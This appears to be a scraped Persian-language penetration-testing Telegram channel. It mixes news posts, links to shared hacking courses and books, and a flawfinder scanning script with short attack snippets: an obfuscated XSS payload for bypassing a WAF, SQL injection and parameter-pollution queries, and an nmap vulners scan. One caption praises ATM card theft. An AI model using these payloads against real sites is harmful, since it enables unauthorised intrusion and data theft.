اینترنت ماهوارهای استارلینک که از آن به نام «اینترنت آزاد» نام برده میشود، عملیاتی و نتیجه تست سرعت آن منتشر شد !
شنیده شده که این سرویس برای ایران هم ارائه خواهد شد. با اضافه شدن ماهوارههای بیشتری در هفتههای آتی، سرعت اینترنت بر روی این شبکه به ۶۰۰مگابیت هم خواهد رسید !
@unidentified_tm
#news
شنیده شده که این سرویس برای ایران هم ارائه خواهد شد. با اضافه شدن ماهوارههای بیشتری در هفتههای آتی، سرعت اینترنت بر روی این شبکه به ۶۰۰مگابیت هم خواهد رسید !
@unidentified_tm
#news
دوره های مرتبط با تست نفوذ از یودمی
Cybersecurity Collection:
https://drive.google.com/drive/folders/1q2sOBNU4lPBkwtF1Msl6uCACBV5TUGWD
Kali linux - Complete Training Program from Scratch course:
https://drive.google.com/folderview?id=1714TBeP8chDWSIPCcALAuEM5ZNQsLYsn
Bug Bounty Hunting Guide to an Advanced Earning Method:
https://drive.google.com/drive/folders/1ytZk4T1EnPPwmtt9FJX0BjNPnafzPWwr
Learn Ethical Hacking From Scratch:
https://drive.google.com/folderview?id=1Ns62tznu2mj7Q0QktrWGCcNsrL5CigtN
Ethical Hacking With Python, JavaScript and Kali Linux:
https://drive.google.com/folderview?id=1wniooIDbtt7yI9tx1sCjVdKn3ftZNas2
منبع geeekgirls
Cybersecurity Collection:
https://drive.google.com/drive/folders/1q2sOBNU4lPBkwtF1Msl6uCACBV5TUGWD
Kali linux - Complete Training Program from Scratch course:
https://drive.google.com/folderview?id=1714TBeP8chDWSIPCcALAuEM5ZNQsLYsn
Bug Bounty Hunting Guide to an Advanced Earning Method:
https://drive.google.com/drive/folders/1ytZk4T1EnPPwmtt9FJX0BjNPnafzPWwr
Learn Ethical Hacking From Scratch:
https://drive.google.com/folderview?id=1Ns62tznu2mj7Q0QktrWGCcNsrL5CigtN
Ethical Hacking With Python, JavaScript and Kali Linux:
https://drive.google.com/folderview?id=1wniooIDbtt7yI9tx1sCjVdKn3ftZNas2
منبع geeekgirls
#IoT #Analyzer #C #SourceCodeAnalysis #Automation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزارهای خوب و قدرتمند جهت کشف آسیبپذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder میباشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایلهای سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرمافزارها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
find . -regex ".*\.c$" | while read c_file; do echo "\n############$c_file############";flawfinder $c_file | egrep -i "\(port\)|\(buffer\)|\(shell\)|\(integer\)|Hits = "; done
لینک گیت هاب:
https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md
@Unidentified_TM
#securation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزارهای خوب و قدرتمند جهت کشف آسیبپذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder میباشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایلهای سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرمافزارها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
find . -regex ".*\.c$" | while read c_file; do echo "\n############$c_file############";flawfinder $c_file | egrep -i "\(port\)|\(buffer\)|\(shell\)|\(integer\)|Hits = "; done
لینک گیت هاب:
https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md
@Unidentified_TM
#securation
https://www.dhs.gov/xlibrary/assets/opnbiz/admt_firstsource_awards_fy2008.csv
دوستان این فایل از سایت وزارت امنیت بلاد کفر یا همون امریکا هستش توش اطلاعات هزینه های نرم افزار ها برای سازمان های امریکا هست آخرش هم گفته کلا چقد بوده و کجا و چطوری خرج شده اسم پروژه و نرم افزار هم زده ..
@Unidentified_TM
دوستان این فایل از سایت وزارت امنیت بلاد کفر یا همون امریکا هستش توش اطلاعات هزینه های نرم افزار ها برای سازمان های امریکا هست آخرش هم گفته کلا چقد بوده و کجا و چطوری خرج شده اسم پروژه و نرم افزار هم زده ..
@Unidentified_TM
https://mega.nz/folder/utEVjARY#fFcYEi6PFiwKsrG3OHcAoA
کلکسیون کتاب های مرتبط با تست نفوذ
کلکسیون کتاب های مرتبط با تست نفوذ
mega.nz
File folder on MEGA
عاشورای حسینی را به تموم مسلمین جهان تسلیت عرض میکنیم.
🏴السلام و علیک یا حسین ابن علی
@Unidentified_tm
🏴السلام و علیک یا حسین ابن علی
@Unidentified_tm
پک کامل دوره های تست نفوذ از منابع مختلف
https://drive.google.com/drive/folders/1g152p22t0od_Ak1YEqTdTCIxcI57eL36
https://drive.google.com/drive/folders/1g152p22t0od_Ak1YEqTdTCIxcI57eL36
🌹کشف آسیب پذیری در سرویس های سرور هدف با استفاده از اسکریپت vulners
دستورالعمل:
و سپس:
@Unidentified_TM
دستورالعمل:
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedbو سپس:
nmap -sV --script vulners <target>
@Unidentified_TM
پیلود xss برای بایپس کردن WAF
<svg onload=alert(1)>
@Unidentified_TM
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
<svg onload=alert(1)>
@Unidentified_TM
This media is not supported in your browser
VIEW IN TELEGRAM
اینم یه حرکت هوشمندانه برای سرقت اطلاعات کارت بانکی و حساب در دستگاه عابر بانک((:
نحوه ی بایپس کردن Web Application Firewall در حملات sqli !
حمله ی معمولی:
حمله توسط روش HPP:
@Unidentified_TM
حمله ی معمولی:
http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1,2,3 FROM Users WHERE id=3 --حمله توسط روش HPP:
http://webApplication/showproducts.asp?prodID=9 /*&prodID=*/UNION /*&prodID=*/SELECT 1 &prodID=2 &prodID=3 FROM /*&prodID=*/Users /*&prodID=*/ WHERE id=3 --@Unidentified_TM
سوالات خیلی از دوستان راجع به نقشه راه بود
انشالله بزودی راجع به نقشه راه پست میذارم
انشالله بزودی راجع به نقشه راه پست میذارم